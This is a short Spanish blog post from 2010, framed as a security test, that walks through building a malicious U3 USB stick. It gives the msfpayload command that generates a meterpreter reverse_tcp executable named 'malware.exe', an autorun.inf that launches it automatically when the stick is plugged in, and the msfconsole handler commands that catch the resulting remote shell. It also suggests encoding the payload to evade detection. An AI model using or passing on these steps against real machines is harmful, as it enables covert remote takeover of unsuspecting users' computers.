domingo, 20 de junio de 2010

USB U3 con MetaSploit para test de seguridad

En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.


1. Generamos el Payload con MetaSploit
En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.


2. Creamos nuestra ISO
Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:
[AutoRun]
open=malware.exe

Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.


3. Grabamos la ISO
Luego corremos Universal Customizer y vamos siguiendo los pasos:


Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.


4. Escuchamos por la Conexión Reversa
Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:
./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false

exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.

LINKS RELACIONADOS:
- Ataques USB con tecnología U3 por Rafael Montero
- USB Keys & Metasploit for fun and profit
- Sallis Usb Hacks
- Universal Customizer


Visto en blog www.KUNGFOOSION.com

No hay comentarios: